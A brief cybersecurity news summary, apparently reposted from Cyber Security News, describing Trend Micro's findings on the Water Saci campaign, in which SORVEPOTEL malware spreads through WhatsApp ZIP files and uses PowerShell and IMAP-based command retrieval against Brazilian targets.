The Water Saci campaign identified by Trend Micro involves sophisticated malware that exploits WhatsApp to spread quickly among users. First noted in September 2025, it has evolved, utilizing a script-based attack chain that departs from traditional .NET patterns. The malware automatically sends malicious ZIP files to WhatsApp contacts, drastically increasing its infection potential.
The infection starts when users extract ZIP archives containing a VBS downloader, initiating fileless execution via PowerShell. SORVEPOTEL’s unique dual-channel communication architecture distinguishes it from conventional threats, utilizing IMAP for command retrieval and maintaining resilience in command-and-control operations. The malware can execute over twenty commands, offering extensive remote access capabilities that pose substantial risks, especially to Brazilian financial institutions and enterprises.
👉 Pročitaj original: Cyber Security News
